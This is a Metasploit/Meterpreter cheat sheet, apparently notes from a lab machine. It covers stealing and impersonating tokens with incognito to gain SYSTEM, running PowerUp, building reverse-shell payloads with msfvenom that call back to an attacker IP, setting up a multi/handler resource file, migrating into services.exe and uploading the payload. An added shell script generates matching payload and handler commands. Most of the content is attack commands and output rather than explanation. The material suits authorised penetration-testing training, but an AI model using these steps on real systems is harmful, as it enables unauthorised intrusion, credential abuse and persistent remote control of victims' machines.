Metasploit / Meterpreter
Modules (Meterpreter extensions, loaded with load <name>)
List of extensions:
- espia : screenshot capture.
- incognito : allows you to steal and impersonate user tokens.
- lanattacks : rogue DHCP and TFTP servers run from the target.
- powershell : enables PowerShell (interactive shell, single command, script import, ...).
- python : runs Python code inside the Meterpreter session.
- stdapi : standard API (file system, network, processes, UI); loaded by default.
- winpmem : physical memory dump of the target.
- extapi : extended API (clipboard, services, window enumeration, WMI, ADSI).
- kiwi : Mimikatz (credential dumping, Kerberos tickets, ...).
- peinjector : injects a payload into PE executables on the target.
- priv : getsystem, hashdump, timestomp.
- sniffer : packet capture on the target's interfaces.
- unhook : removes userland hooks placed by AV/EDR.
Incognito
Lists and impersonates the access tokens present on the host. Delegation tokens (interactive logons, services) can also be used to authenticate to other systems; impersonation tokens only work locally. Only tokens of processes you can open are visible, hence the warning below when the session does not run as SYSTEM. If a token name is not found, escape the backslash ("BUILTIN\\Administrators").
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
[...]
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Powershell
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
[...]
The dot-sourced script (PowerUp.ps1 here) must already be on the target, in the session's current directory (see Upload / Download). The extension also provides powershell_import, which loads a local .ps1 into the session, and powershell_execute, which runs a single command, so the interactive shell is not required.
Msfvenom
List payloads: msfvenom --list payloads
# Windows (x64 EXE, stageless)
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 \
-f exe -o shell.exe
# Windows (x86 EXE with encoder, staged; encoders avoid bad characters, they are not AV evasion)
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai \
LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe
# Linux (x64 ELF, stageless)
$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 \
-f elf -o shell.bin
staged (meterpreter/reverse_tcp, with a slash) : 2 parts; a small stager runs first, connects back and downloads the rest of the payload (the stage) from the handler. Smaller binary, but it only works against a Metasploit handler.
stageless (meterpreter_reverse_tcp, with an underscore) : the whole payload is directly inside the binary. Larger, but nothing is fetched at run time.
In both cases the handler's payload must be set to exactly the name given to msfvenom; a staged binary will not complete against a handler configured for the stageless variant, and vice versa.
Resource file
File msf.rc:
use exploit/multi/handler
set LHOST tun0
set LPORT 9001
set payload windows/x64/meterpreter_reverse_tcp
exploit -j
Command: msfconsole -r msf.rc
exploit -j runs the handler as a background job. By default the job stops after the first session; add set ExitOnSession false to keep it listening for further callbacks.
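Added example, not from the original notes: a small POSIX shell script that derives both the msfvenom command line and a matching multi/handler resource file from a single payload name, so the staged/stageless variant in the handler can never drift from the one baked into the binary. The payload classification, the output-format choice, the LHOST/LPORT values and the msf.rc file name are the example's own assumptions; msfvenom itself is only printed, not executed.

```shell
#!/bin/sh
# Added example (not part of the original notes): keep the handler in sync with
# the msfvenom artifact. LHOST/LPORT values and file names are assumptions.

# Classify a Metasploit payload name: "<stage>/<stager>" (slash) is staged,
# "<stage>_<stager>" (underscore) is stageless. Handles meterpreter and shell.
payload_kind() {
    case "$1" in
        */meterpreter/*|*/shell/*) echo staged ;;
        */meterpreter_*|*/shell_*) echo stageless ;;
        *) echo unknown ;;
    esac
}

# Pick the msfvenom output format from the payload platform.
payload_format() {
    case "$1" in
        windows/*) echo exe ;;
        linux/*)   echo elf ;;
        *)         echo raw ;;
    esac
}

# Print the msfvenom command for payload $1, LHOST $2, LPORT $3, output file $4.
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' \
        "$1" "$2" "$3" "$(payload_format "$1")" "$4"
}

# Print a multi/handler resource file for payload $1, LHOST $2, LPORT $3.
# ExitOnSession false keeps the job listening after the first session.
handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set payload %s\n' "$1"
    printf 'set LHOST %s\n' "$2"
    printf 'set LPORT %s\n' "$3"
    printf 'set ExitOnSession false\n'
    printf 'exploit -j\n'
}

# Usage: ./gen.sh <payload> <LHOST> <LPORT> <outfile>
# Prints the msfvenom command and writes the matching msf.rc in the current directory.
if [ "$#" -ge 4 ]; then
    kind=$(payload_kind "$1")
    if [ "$kind" = unknown ]; then
        echo "unrecognised payload name: $1" >&2
        exit 1
    fi
    echo "# $kind payload"
    venom_cmd "$1" "$2" "$3" "$4"
    handler_rc "$1" "$2" "$3" > msf.rc
    echo "# handler written to msf.rc (run: msfconsole -r msf.rc)"
fi
```

Run it as ./gen.sh windows/x64/meterpreter_reverse_tcp 10.9.52.138 9001 shell.exe, then paste the printed msfvenom line and start the handler with msfconsole -r msf.rc; the same payload string appears in both, which is the check that matters.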
Migrate to a process
More information about the migrate command.
Even though you hold a higher-privileged token, you may not actually have the permissions of a privileged user: Windows uses the primary token of the process, not the impersonated token, to decide what the process can or cannot do. Ensure that you migrate to a process with the correct permissions (a SYSTEM process such as services.exe in the example below). Migrating also keeps the session alive if the original process exits. Recent Meterpreter versions accept a process name instead of a PID (migrate -N services.exe).
meterpreter > ps | grep services
Filtering on 'services'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
meterpreter > migrate 668
[*] Migrating from 996 to 668...
[*] Migration completed successfully.
Search for files
meterpreter > search -f shell.exe
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\bruce\Desktop\shell.exe 73802 2021-12-11 12:20:17 +0100
Upload / Download
Quote Windows paths (single quotes, or doubled backslashes) so that the backslashes are not interpreted as escapes.
meterpreter > download shell.exe
[*] Downloading: shell.exe -> /home/.../alfred/shell.exe
[*] Downloaded 72.07 KiB of 72.07 KiB (100.0%): shell.exe -> /home/.../alfred/shell.exe
[*] download : shell.exe -> /home/.../alfred/shell.exe
meterpreter > upload shell.exe 'c:\Users\bruce\Desktop\reverse.exe'
[*] uploading : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] uploaded : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe